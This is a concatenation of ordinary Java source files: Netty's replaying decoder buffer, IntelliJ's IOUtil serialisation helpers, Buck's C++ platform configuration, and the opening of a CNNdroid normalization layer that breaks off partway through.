public ByteBuf readBytes(ByteBuf dst, int dstIndex, int length) {
checkReadableBytes(length);
buffer.readBytes(dst, dstIndex, length);
return this;
}
@Override
public ByteBuf readBytes(ByteBuf dst, int length) {
reject();
return this;
}
@Override
public ByteBuf readBytes(ByteBuf dst) {
checkReadableBytes(dst.writableBytes());
buffer.readBytes(dst);
return this;
}
@Override
public int readBytes(GatheringByteChannel out, int length) {
reject();
return 0;
}
@Override
public ByteBuf readBytes(int length) {
checkReadableBytes(length);
return buffer.readBytes(length);
}
@Override
public ByteBuf readSlice(int length) {
checkReadableBytes(length);
return buffer.readSlice(length);
}
@Override
public ByteBuf readBytes(OutputStream out, int length) {
reject();
return this;
}
@Override
public int readerIndex() {
return buffer.readerIndex();
}
@Override
public ByteBuf readerIndex(int readerIndex) {
buffer.readerIndex(readerIndex);
return this;
}
@Override
public int readInt() {
checkReadableBytes(4);
return buffer.readInt();
}
@Override
public long readUnsignedInt() {
checkReadableBytes(4);
return buffer.readUnsignedInt();
}
@Override
public long readLong() {
checkReadableBytes(8);
return buffer.readLong();
}
@Override
public int readMedium() {
checkReadableBytes(3);
return buffer.readMedium();
}
@Override
public int readUnsignedMedium() {
checkReadableBytes(3);
return buffer.readUnsignedMedium();
}
@Override
public short readShort() {
checkReadableBytes(2);
return buffer.readShort();
}
@Override
public int readUnsignedShort() {
checkReadableBytes(2);
return buffer.readUnsignedShort();
}
@Override
public char readChar() {
checkReadableBytes(2);
return buffer.readChar();
}
@Override
public float readFloat() {
checkReadableBytes(4);
return buffer.readFloat();
}
@Override
public double readDouble() {
checkReadableBytes(8);
return buffer.readDouble();
}
@Override
public ByteBuf resetReaderIndex() {
buffer.resetReaderIndex();
return this;
}
@Override
public ByteBuf resetWriterIndex() {
reject();
return this;
}
@Override
public ByteBuf setBoolean(int index, boolean value) {
reject();
return this;
}
@Override
public ByteBuf setByte(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, byte[] src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, byte[] src) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuffer src) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuf src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuf src, int length) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuf src) {
reject();
return this;
}
@Override
public int setBytes(int index, InputStream in, int length) {
reject();
return 0;
}
@Override
public ByteBuf setZero(int index, int length) {
reject();
return this;
}
@Override
public int setBytes(int index, ScatteringByteChannel in, int length) {
reject();
return 0;
}
@Override
public ByteBuf setIndex(int readerIndex, int writerIndex) {
reject();
return this;
}
@Override
public ByteBuf setInt(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setLong(int index, long value) {
reject();
return this;
}
@Override
public ByteBuf setMedium(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setShort(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setChar(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setFloat(int index, float value) {
reject();
return this;
}
@Override
public ByteBuf setDouble(int index, double value) {
reject();
return this;
}
@Override
public ByteBuf skipBytes(int length) {
checkReadableBytes(length);
buffer.skipBytes(length);
return this;
}
@Override
public ByteBuf slice() {
reject();
return this;
}
@Override
public ByteBuf slice(int index, int length) {
checkIndex(index, length);
return buffer.slice(index, length);
}
@Override
public int nioBufferCount() {
return buffer.nioBufferCount();
}
@Override
public ByteBuffer nioBuffer() {
reject();
return null;
}
@Override
public ByteBuffer nioBuffer(int index, int length) {
checkIndex(index, length);
return buffer.nioBuffer(index, length);
}
@Override
public ByteBuffer[] nioBuffers() {
reject();
return null;
}
@Override
public ByteBuffer[] nioBuffers(int index, int length) {
checkIndex(index, length);
return buffer.nioBuffers(index, length);
}
@Override
public ByteBuffer internalNioBuffer(int index, int length) {
checkIndex(index, length);
return buffer.internalNioBuffer(index, length);
}
@Override
public String toString(int index, int length, Charset charset) {
checkIndex(index, length);
return buffer.toString(index, length, charset);
}
@Override
public String toString(Charset charsetName) {
reject();
return null;
}
@Override
public String toString() {
return StringUtil.simpleClassName(this) + '(' +
"ridx=" +
readerIndex() +
", " +
"widx=" +
writerIndex() +
')';
}
@Override
public boolean isWritable() {
return false;
}
@Override
public boolean isWritable(int size) {
return false;
}
@Override
public int writableBytes() {
return 0;
}
@Override
public int maxWritableBytes() {
return 0;
}
@Override
public ByteBuf writeBoolean(boolean value) {
reject();
return this;
}
@Override
public ByteBuf writeByte(int value) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(byte[] src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(byte[] src) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuffer src) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuf src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuf src, int length) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuf src) {
reject();
return this;
}
@Override
public int writeBytes(InputStream in, int length) {
reject();
return 0;
}
@Override
public int writeBytes(ScatteringByteChannel in, int length) {
reject();
return 0;
}
@Override
public ByteBuf writeInt(int value) {
reject();
return this;
}
@Override
public ByteBuf writeLong(long value) {
reject();
return this;
}
@Override
public ByteBuf writeMedium(int value) {
reject();
return this;
}
@Override
public ByteBuf writeZero(int length) {
reject();
return this;
}
@Override
public int writerIndex() {
return buffer.writerIndex();
}
@Override
public ByteBuf writerIndex(int writerIndex) {
reject();
return this;
}
@Override
public ByteBuf writeShort(int value) {
reject();
return this;
}
@Override
public ByteBuf writeChar(int value) {
reject();
return this;
}
@Override
public ByteBuf writeFloat(float value) {
reject();
return this;
}
@Override
public ByteBuf writeDouble(double value) {
reject();
return this;
}
private void checkIndex(int index, int length) {
if (index + length > buffer.writerIndex()) {
throw REPLAY;
}
}
private void checkReadableBytes(int readableBytes) {
if (buffer.readableBytes() < readableBytes) {
throw REPLAY;
}
}
@Override
public ByteBuf discardSomeReadBytes() {
reject();
return this;
}
@Override
public int refCnt() {
return buffer.refCnt();
}
@Override
public ByteBuf retain() {
reject();
return this;
}
@Override
public ByteBuf retain(int increment) {
reject();
return this;
}
@Override
public ByteBuf touch() {
buffer.touch();
return this;
}
@Override
public ByteBuf touch(Object hint) {
buffer.touch(hint);
return this;
}
@Override
public boolean release() {
reject();
return false;
}
@Override
public boolean release(int decrement) {
reject();
return false;
}
@Override
public ByteBuf unwrap() {
reject();
return this;
}
private static void reject() {
throw new UnsupportedOperationException("not a replayable operation");
}
}
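// ---------------------------------------------------------------------------------------------
// Editor's note: a hedged usage sketch, not part of the original file. It illustrates the pattern
// this buffer enables inside a ReplayingDecoder subclass: decode() reads as if every byte were
// already available, and the REPLAY signal thrown by the checks above makes the decoder rewind
// and retry once more data arrives. The length-prefixed frame format is an assumed example, not a
// Netty API.
class LengthPrefixedFrameDecoderSketch extends ReplayingDecoder<Void> {
    @Override
    protected void decode(io.netty.channel.ChannelHandlerContext ctx, ByteBuf in,
            java.util.List<Object> out) {
        // No manual readableBytes() checks are needed: readInt()/readBytes() throw REPLAY
        // internally when data is incomplete, and ReplayingDecoder resets the reader index and
        // calls decode() again later.
        int length = in.readInt();
        out.add(in.readBytes(length));
    }
}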
|
|
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.util.io;
import com.intellij.openapi.util.ThreadLocalCachedValue;
import com.intellij.openapi.util.ThrowableComputable;
import com.intellij.openapi.util.io.FileUtil;
import com.intellij.openapi.vfs.CharsetToolkit;
import com.intellij.util.SystemProperties;
import org.jetbrains.annotations.NonNls;
import org.jetbrains.annotations.NotNull;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.charset.Charset;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
public class IOUtil {
public static final boolean ourByteBuffersUseNativeByteOrder = SystemProperties.getBooleanProperty("idea.bytebuffers.use.native.byte.order", true);
private static final int STRING_HEADER_SIZE = 1;
private static final int STRING_LENGTH_THRESHOLD = 255;
@NonNls private static final String LONGER_THAN_64K_MARKER = "LONGER_THAN_64K";
private IOUtil() {}
public static String readString(@NotNull DataInput stream) throws IOException {
int length = stream.readInt();
if (length == -1) return null;
if (length == 0) return "";
byte[] bytes = new byte[length*2];
stream.readFully(bytes);
return new String(bytes, 0, length*2, CharsetToolkit.UTF_16BE_CHARSET);
}
public static void writeString(String s, @NotNull DataOutput stream) throws IOException {
if (s == null) {
stream.writeInt(-1);
return;
}
stream.writeInt(s.length());
if (s.isEmpty()) {
return;
}
char[] chars = s.toCharArray();
byte[] bytes = new byte[chars.length * 2];
for (int i = 0, i2 = 0; i < chars.length; i++, i2 += 2) {
char aChar = chars[i];
bytes[i2] = (byte)(aChar >>> 8 & 0xFF);
bytes[i2 + 1] = (byte)(aChar & 0xFF);
}
stream.write(bytes);
}
public static void writeUTFTruncated(@NotNull DataOutput stream, @NotNull String text) throws IOException {
// We should not compare the number of characters to 65535; it is the number of encoded
// bytes that must be compared. Truncate to 16383 characters, assuming a rough upper
// bound of 4 bytes per character.
if (text.length() > 16383) {
stream.writeUTF(text.substring(0, 16383));
}
else {
stream.writeUTF(text);
}
}
private static final ThreadLocalCachedValue<byte[]> ourReadWriteBuffersCache = new ThreadLocalCachedValue<byte[]>() {
@Override
protected byte[] create() {
return allocReadWriteUTFBuffer();
}
};
public static void writeUTF(@NotNull DataOutput storage, @NotNull final String value) throws IOException {
writeUTFFast(ourReadWriteBuffersCache.getValue(), storage, value);
}
public static String readUTF(@NotNull DataInput storage) throws IOException {
return readUTFFast(ourReadWriteBuffersCache.getValue(), storage);
}
@NotNull
public static byte[] allocReadWriteUTFBuffer() {
return new byte[STRING_LENGTH_THRESHOLD + STRING_HEADER_SIZE];
}
public static void writeUTFFast(@NotNull byte[] buffer, @NotNull DataOutput storage, @NotNull final String value) throws IOException {
int len = value.length();
if (len < STRING_LENGTH_THRESHOLD) {
buffer[0] = (byte)len;
boolean isAscii = true;
for (int i = 0; i < len; i++) {
char c = value.charAt(i);
if (c >= 128) {
isAscii = false;
break;
}
buffer[i + STRING_HEADER_SIZE] = (byte)c;
}
if (isAscii) {
storage.write(buffer, 0, len + STRING_HEADER_SIZE);
return;
}
}
storage.writeByte((byte)0xFF);
try {
storage.writeUTF(value);
}
catch (UTFDataFormatException e) {
storage.writeUTF(LONGER_THAN_64K_MARKER);
writeString(value, storage);
}
}
public static final Charset US_ASCII = Charset.forName("US-ASCII");
private static final ThreadLocalCachedValue<char[]> spareBufferLocal = new ThreadLocalCachedValue<char[]>() {
@Override
protected char[] create() {
return new char[STRING_LENGTH_THRESHOLD];
}
};
public static String readUTFFast(@NotNull byte[] buffer, @NotNull DataInput storage) throws IOException {
int len = 0xFF & (int)storage.readByte();
if (len == 0xFF) {
String result = storage.readUTF();
if (LONGER_THAN_64K_MARKER.equals(result)) {
return readString(storage);
}
return result;
}
if (len == 0) return "";
storage.readFully(buffer, 0, len);
char[] chars = spareBufferLocal.getValue();
for (int i = 0; i < len; ++i) chars[i] = (char)(buffer[i] & 0xFF);
return new String(chars, 0, len);
}
public static boolean isAscii(@NotNull String str) {
return isAscii((CharSequence)str);
}
public static boolean isAscii(@NotNull CharSequence str) {
for (int i = 0, length = str.length(); i < length; ++ i) {
if (str.charAt(i) >= 128) return false;
}
return true;
}
public static boolean isAscii(char c) {
return c < 128;
}
public static boolean deleteAllFilesStartingWith(@NotNull File file) {
final String baseName = file.getName();
File parentFile = file.getParentFile();
final File[] files = parentFile != null ? parentFile.listFiles(new FileFilter() {
@Override
public boolean accept(final File pathname) {
return pathname.getName().startsWith(baseName);
}
}): null;
boolean ok = true;
if (files != null) {
for (File f : files) {
ok &= FileUtil.delete(f);
}
}
return ok;
}
public static void syncStream(OutputStream stream) throws IOException {
stream.flush();
try {
Field outField = FilterOutputStream.class.getDeclaredField("out");
outField.setAccessible(true);
while (stream instanceof FilterOutputStream) {
Object o = outField.get(stream);
if (o instanceof OutputStream) {
stream = (OutputStream)o;
} else {
break;
}
}
if (stream instanceof FileOutputStream) {
((FileOutputStream)stream).getFD().sync();
}
}
catch (NoSuchFieldException e) {
throw new RuntimeException(e);
}
catch (IllegalAccessException e) {
throw new RuntimeException(e);
}
}
public static <T> T openCleanOrResetBroken(@NotNull ThrowableComputable<T, IOException> factoryComputable, final File file) throws IOException {
return openCleanOrResetBroken(factoryComputable, new Runnable() {
@Override
public void run() {
deleteAllFilesStartingWith(file);
}
});
}
public static <T> T openCleanOrResetBroken(@NotNull ThrowableComputable<T, IOException> factoryComputable, Runnable cleanupCallback) throws IOException {
for(int i = 0; i < 2; ++i) {
try {
return factoryComputable.compute();
} catch (IOException ex) {
if (i == 1) throw ex;
cleanupCallback.run();
}
}
return null;
}
public static void writeStringList(final DataOutput out, final Collection<String> list) throws IOException {
DataInputOutputUtil.writeINT(out, list.size());
for (final String s : list) {
writeUTF(out, s);
}
}
public static List<String> readStringList(final DataInput in) throws IOException {
final int size = DataInputOutputUtil.readINT(in);
final ArrayList<String> strings = new ArrayList<String>(size);
for (int i = 0; i < size; i++) {
strings.add(readUTF(in));
}
return strings;
}
}
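// ---------------------------------------------------------------------------------------------
// Editor's note: a small round-trip sketch, not part of the original file. It shows the intended
// pairing of IOUtil.writeUTF/readUTF: short ASCII strings take the single-byte-length fast path in
// writeUTFFast, other strings fall back to DataOutput.writeUTF, and strings whose encoding exceeds
// 64K bytes fall back to writeString. The helper class below is hypothetical.
class IOUtilRoundTripSketch {
    static String roundTrip(String value) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(bytes);
        IOUtil.writeUTF(out, value);
        out.flush();
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(bytes.toByteArray()));
        return IOUtil.readUTF(in); // equal to the original value
    }
}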
|
|
/*
* Copyright 2015-present Facebook, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License. You may obtain
* a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package com.facebook.buck.cxx;
import com.facebook.buck.log.Logger;
import com.facebook.buck.model.BuildTarget;
import com.facebook.buck.model.Flavor;
import com.facebook.buck.model.InternalFlavor;
import com.facebook.buck.rules.HashedFileTool;
import com.facebook.buck.rules.LazyDelegatingTool;
import com.facebook.buck.rules.Tool;
import com.facebook.buck.util.HumanReadableException;
import com.facebook.buck.util.environment.Platform;
import com.google.common.base.Function;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSet;
import java.util.Optional;
public class CxxPlatforms {
private static final Logger LOG = Logger.get(CxxPlatforms.class);
private static final ImmutableList<String> DEFAULT_ASFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_ASPPFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CXXFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CPPFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CXXPPFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_LDFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_ARFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_RANLIBFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_COMPILER_ONLY_FLAGS = ImmutableList.of();
// Utility class, do not instantiate.
private CxxPlatforms() { }
private static Optional<SharedLibraryInterfaceFactory> getSharedLibraryInterfaceFactory(
CxxBuckConfig config,
Platform platform) {
Optional<SharedLibraryInterfaceFactory> sharedLibraryInterfaceFactory = Optional.empty();
if (config.shouldUseSharedLibraryInterfaces()) {
switch (platform) {
case LINUX:
sharedLibraryInterfaceFactory =
Optional.of(
ElfSharedLibraryInterfaceFactory.of(config.getToolProvider("objcopy").get()));
break;
// $CASES-OMITTED$
default:
}
}
return sharedLibraryInterfaceFactory;
}
public static CxxPlatform build(
Flavor flavor,
Platform platform,
final CxxBuckConfig config,
CompilerProvider as,
PreprocessorProvider aspp,
CompilerProvider cc,
CompilerProvider cxx,
PreprocessorProvider cpp,
PreprocessorProvider cxxpp,
LinkerProvider ld,
Iterable<String> ldFlags,
Tool strip,
final Archiver ar,
final Tool ranlib,
final SymbolNameTool nm,
ImmutableList<String> asflags,
ImmutableList<String> asppflags,
ImmutableList<String> cflags,
ImmutableList<String> cppflags,
String sharedLibraryExtension,
String sharedLibraryVersionedExtensionFormat,
String staticLibraryExtension,
String objectFileExtension,
DebugPathSanitizer compilerDebugPathSanitizer,
DebugPathSanitizer assemblerDebugPathSanitizer,
ImmutableMap<String, String> flagMacros,
Optional<String> binaryExtension,
HeaderVerification headerVerification) {
// TODO(beng, agallagher): Generalize this so we don't need all these setters.
CxxPlatform.Builder builder = CxxPlatform.builder();
final Archiver arDelegate = ar instanceof LazyDelegatingArchiver ?
((LazyDelegatingArchiver) ar).getDelegate() : ar;
builder
.setFlavor(flavor)
.setAs(config.getCompilerProvider("as").orElse(as))
.setAspp(config.getPreprocessorProvider("aspp").orElse(aspp))
.setCc(config.getCompilerProvider("cc").orElse(cc))
.setCxx(config.getCompilerProvider("cxx").orElse(cxx))
.setCpp(config.getPreprocessorProvider("cpp").orElse(cpp))
.setCxxpp(config.getPreprocessorProvider("cxxpp").orElse(cxxpp))
.setCuda(config.getCompilerProvider("cuda"))
.setCudapp(config.getPreprocessorProvider("cudapp"))
.setAsm(config.getCompilerProvider("asm"))
.setAsmpp(config.getPreprocessorProvider("asmpp"))
.setLd(config.getLinkerProvider("ld", ld.getType()).orElse(ld))
.addAllLdflags(ldFlags)
.setAr(new LazyDelegatingArchiver(() ->
getTool("ar", config)
.map(getArchiver(arDelegate.getClass(), config)::apply)
.orElse(arDelegate)))
.setRanlib(new LazyDelegatingTool(() -> getTool("ranlib", config).orElse(ranlib)))
.setStrip(getTool("strip", config).orElse(strip))
.setSharedLibraryExtension(sharedLibraryExtension)
.setSharedLibraryVersionedExtensionFormat(sharedLibraryVersionedExtensionFormat)
.setStaticLibraryExtension(staticLibraryExtension)
.setObjectFileExtension(objectFileExtension)
.setCompilerDebugPathSanitizer(compilerDebugPathSanitizer)
.setAssemblerDebugPathSanitizer(assemblerDebugPathSanitizer)
.setFlagMacros(flagMacros)
.setBinaryExtension(binaryExtension)
.setHeaderVerification(headerVerification)
.setPublicHeadersSymlinksEnabled(config.getPublicHeadersSymlinksEnabled())
.setPrivateHeadersSymlinksEnabled(config.getPrivateHeadersSymlinksEnabled());
builder.setSymbolNameTool(new LazyDelegatingSymbolNameTool(() -> {
Optional<Tool> configNm = getTool("nm", config);
if (configNm.isPresent()) {
return new PosixNmSymbolNameTool(configNm.get());
} else {
return nm;
}
}));
builder.setSharedLibraryInterfaceFactory(getSharedLibraryInterfaceFactory(config, platform));
builder.addAllCflags(cflags);
builder.addAllCxxflags(cflags);
builder.addAllCppflags(cppflags);
builder.addAllCxxppflags(cppflags);
builder.addAllAsflags(asflags);
builder.addAllAsppflags(asppflags);
CxxPlatforms.addToolFlagsFromConfig(config, builder);
return builder.build();
}
/**
* Creates a CxxPlatform with the given flavor from a CxxBuckConfig, using another
* (default) CxxPlatform to supply any values the config does not override.
*/
public static CxxPlatform copyPlatformWithFlavorAndConfig(
CxxPlatform defaultPlatform,
Platform platform,
CxxBuckConfig config,
Flavor flavor) {
return CxxPlatforms.build(
flavor,
platform,
config,
defaultPlatform.getAs(),
defaultPlatform.getAspp(),
defaultPlatform.getCc(),
defaultPlatform.getCxx(),
defaultPlatform.getCpp(),
defaultPlatform.getCxxpp(),
defaultPlatform.getLd(),
defaultPlatform.getLdflags(),
defaultPlatform.getStrip(),
defaultPlatform.getAr(),
defaultPlatform.getRanlib(),
defaultPlatform.getSymbolNameTool(),
defaultPlatform.getAsflags(),
defaultPlatform.getAsppflags(),
defaultPlatform.getCflags(),
defaultPlatform.getCppflags(),
defaultPlatform.getSharedLibraryExtension(),
defaultPlatform.getSharedLibraryVersionedExtensionFormat(),
defaultPlatform.getStaticLibraryExtension(),
defaultPlatform.getObjectFileExtension(),
defaultPlatform.getCompilerDebugPathSanitizer(),
defaultPlatform.getAssemblerDebugPathSanitizer(),
defaultPlatform.getFlagMacros(),
defaultPlatform.getBinaryExtension(),
defaultPlatform.getHeaderVerification());
}
private static Function<Tool, Archiver> getArchiver(final Class<? extends Archiver> arClass,
final CxxBuckConfig config) {
return input -> {
try {
return config.getArchiver(input)
.orElse(arClass.getConstructor(Tool.class).newInstance(input));
} catch (ReflectiveOperationException e) {
throw new RuntimeException(e);
}
};
}
private static ImmutableMap<String, Flavor> getHostFlavorMap() {
// TODO(coneko): base the host flavor on architecture, too.
return ImmutableMap.<String, Flavor>builder()
.put(Platform.LINUX.getAutoconfName(), InternalFlavor.of("linux-x86_64"))
.put(Platform.MACOS.getAutoconfName(), InternalFlavor.of("macosx-x86_64"))
.put(Platform.WINDOWS.getAutoconfName(), InternalFlavor.of("windows-x86_64"))
.put(Platform.FREEBSD.getAutoconfName(), InternalFlavor.of("freebsd-x86_64"))
.build();
}
public static ImmutableSet<Flavor> getAllPossibleHostFlavors() {
return ImmutableSet.copyOf(getHostFlavorMap().values());
}
public static Flavor getHostFlavor() {
String platformName = Platform.detect().getAutoconfName();
Flavor hostFlavor = getHostFlavorMap().get(platformName);
if (hostFlavor == null) {
throw new HumanReadableException("Unable to determine the host platform.");
}
return hostFlavor;
}
public static void addToolFlagsFromConfig(
CxxBuckConfig config,
CxxPlatform.Builder builder) {
ImmutableList<String> asflags = config.getFlags("asflags").orElse(DEFAULT_ASFLAGS);
ImmutableList<String> cflags = config.getFlags("cflags").orElse(DEFAULT_CFLAGS);
ImmutableList<String> cxxflags = config.getFlags("cxxflags").orElse(DEFAULT_CXXFLAGS);
ImmutableList<String> compilerOnlyFlags = config.getFlags("compiler_only_flags").orElse(
DEFAULT_COMPILER_ONLY_FLAGS);
builder
.addAllAsflags(asflags)
.addAllAsppflags(config.getFlags("asppflags").orElse(DEFAULT_ASPPFLAGS))
.addAllCflags(cflags)
.addAllCflags(compilerOnlyFlags)
.addAllCxxflags(cxxflags)
.addAllCxxflags(compilerOnlyFlags)
.addAllCppflags(config.getFlags("cppflags").orElse(DEFAULT_CPPFLAGS))
.addAllCxxppflags(config.getFlags("cxxppflags").orElse(DEFAULT_CXXPPFLAGS))
.addAllCudaflags(config.getFlags("cudaflags").orElse(ImmutableList.of()))
.addAllCudappflags(config.getFlags("cudappflags").orElse(ImmutableList.of()))
.addAllAsmflags(config.getFlags("asmflags").orElse(ImmutableList.of()))
.addAllAsmppflags(config.getFlags("asmppflags").orElse(ImmutableList.of()))
.addAllLdflags(config.getFlags("ldflags").orElse(DEFAULT_LDFLAGS))
.addAllArflags(config.getFlags("arflags").orElse(DEFAULT_ARFLAGS))
.addAllRanlibflags(config.getFlags("ranlibflags").orElse(DEFAULT_RANLIBFLAGS));
}
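// Illustrative .buckconfig fragment feeding the lookups above. The keys are the ones
// queried in this method; the [cxx] section name and the values follow Buck's standard
// configuration layout and are examples only, not taken from this file:
//
//   [cxx]
//     cflags = -g -O2
//     cxxflags = -g -O2 -std=c++14
//     cppflags = -DNDEBUG
//     ldflags = -Wl,--no-undefined
//     compiler_only_flags = -fcolor-diagnostics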
public static CxxPlatform getConfigDefaultCxxPlatform(
CxxBuckConfig cxxBuckConfig,
ImmutableMap<Flavor, CxxPlatform> cxxPlatformsMap,
CxxPlatform systemDefaultCxxPlatform) {
CxxPlatform defaultCxxPlatform;
Optional<String> defaultPlatform = cxxBuckConfig.getDefaultPlatform();
if (defaultPlatform.isPresent()) {
defaultCxxPlatform = cxxPlatformsMap.get(
InternalFlavor.of(defaultPlatform.get()));
if (defaultCxxPlatform == null) {
LOG.warn(
"Couldn't find default platform %s, falling back to system default",
defaultPlatform.get());
} else {
LOG.debug("Using config default C++ platform %s", defaultCxxPlatform);
return defaultCxxPlatform;
}
} else {
LOG.debug("Using system default C++ platform %s", systemDefaultCxxPlatform);
}
return systemDefaultCxxPlatform;
}
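// Illustrative selection of the config default platform (the "default_platform" key is
// what getDefaultPlatform() is assumed to read; the flavor value is a placeholder):
//
//   [cxx]
//     default_platform = linux-x86_64
//
// If the named flavor is not present in cxxPlatformsMap, the method logs a warning and
// falls back to systemDefaultCxxPlatform.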
private static Optional<Tool> getTool(String name, CxxBuckConfig config) {
return config.getPath(name).map(HashedFileTool::new);
}
public static Iterable<BuildTarget> getParseTimeDeps(CxxPlatform cxxPlatform) {
ImmutableList.Builder<BuildTarget> deps = ImmutableList.builder();
deps.addAll(cxxPlatform.getAspp().getParseTimeDeps());
deps.addAll(cxxPlatform.getAs().getParseTimeDeps());
deps.addAll(cxxPlatform.getCpp().getParseTimeDeps());
deps.addAll(cxxPlatform.getCc().getParseTimeDeps());
deps.addAll(cxxPlatform.getCxxpp().getParseTimeDeps());
deps.addAll(cxxPlatform.getCxx().getParseTimeDeps());
if (cxxPlatform.getCudapp().isPresent()) {
deps.addAll(cxxPlatform.getCudapp().get().getParseTimeDeps());
}
if (cxxPlatform.getCuda().isPresent()) {
deps.addAll(cxxPlatform.getCuda().get().getParseTimeDeps());
}
if (cxxPlatform.getAsmpp().isPresent()) {
deps.addAll(cxxPlatform.getAsmpp().get().getParseTimeDeps());
}
if (cxxPlatform.getAsm().isPresent()) {
deps.addAll(cxxPlatform.getAsm().get().getParseTimeDeps());
}
deps.addAll(cxxPlatform.getLd().getParseTimeDeps());
cxxPlatform.getSharedLibraryInterfaceFactory()
.ifPresent(f -> deps.addAll(f.getParseTimeDeps()));
return deps.build();
}
public static Iterable<BuildTarget> getParseTimeDeps(Iterable<CxxPlatform> cxxPlatforms) {
ImmutableList.Builder<BuildTarget> deps = ImmutableList.builder();
for (CxxPlatform cxxPlatform : cxxPlatforms) {
deps.addAll(getParseTimeDeps(cxxPlatform));
}
return deps.build();
}
}
|
|
package layers;
import android.util.Log;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.util.Scanner;
import numdroid.*;
public class LocalResponseNormalization implements LayerInterface {
private String name; // name of the layer
private MyNum myNum; // for mathematical calculations
private int localSize; // local size
private double alpha; // alpha
private double beta; // beta
private String normRegion; // norm region: "across_channels"
private boolean parallel; // implementation method (parallel or sequential)
private String tuningFolder; // location to store online tuning results
private boolean tuneNow; // flag of whether to execute tuning or not
private boolean tuneFunc; // flag of optional tuning function
private int threadCount; // thread count for acceleration
private int[] threadCounts = {4, 6, 8};
public LocalResponseNormalization(int localSize, double alpha, double beta, String normRegion,
boolean parallel, boolean tuneFunc, String name, String tuningFolder) {
this.localSize = localSize;
this.alpha = alpha;
this.beta = beta;
this.normRegion = normRegion;
this.parallel = parallel;
this.tuneFunc = tuneFunc;
this.name = name;
myNum = new MyNum();
this.tuningFolder = tuningFolder;
tuneNow = false;
File f = new File(tuningFolder + "/" + name + ".txt");
try {
Scanner s = new Scanner(f);
threadCount = Integer.valueOf(s.nextLine());
s.close();
if (corrupted(threadCount))
tuneNow = true;
} catch (FileNotFoundException e) {
tuneNow = true;
}
if (!tuneFunc) {
threadCount = 4;
tuneNow = false;
}
}
@Override
public Object compute(Object input) {
Object output;
long runTime = System.currentTimeMillis();
if (!parallel)
output = lrnLayerSeq((float[][][][])input, localSize, alpha, beta, normRegion);
else if (tuneNow)
output = tuneFunction((float[][][][]) input);
else
output = lrnLayerMultithread((float[][][][]) input, localSize, alpha, beta, normRegion, threadCount);
runTime = System.currentTimeMillis() - runTime;
Log.d("CNNdroid", "layers." + name + ": Computation Run Time = " + String.valueOf(runTime));
return output;
}
///////////////////////////////////////Sequential///////////////////////////////////////////////
private float[][][][] lrnLayerSeq(float[][][][] inputBlob, int localSize, double alpha,
double beta, String normRegion) {
// Calculate sizes.
int n_i = inputBlob.length;
int c_i = inputBlob[0].length;
int h_i = inputBlob[0][0].length;
int w_i = inputBlob[0][0][0].length;
// Initialize the result.
float[][][][] outputBlob = new float[n_i][c_i][h_i][w_i];
// Calculate the result.
if (normRegion.equals("across_channels"))
{
for (int n = 0; n < n_i; ++n)
for (int c = 0; c < c_i; ++c)
// For first few channels, do zero padding.
if (c < (localSize - 1) / 2)
outputBlob[n][c] = myNum.divide(inputBlob[n][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, n, 0, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
// For last few channels, do zero padding.
else if (c > c_i - (localSize - 1) / 2 - 1)
outputBlob[n][c] = myNum.divide(inputBlob[n][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, n, c - (localSize - 1) / 2, c_i, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
else
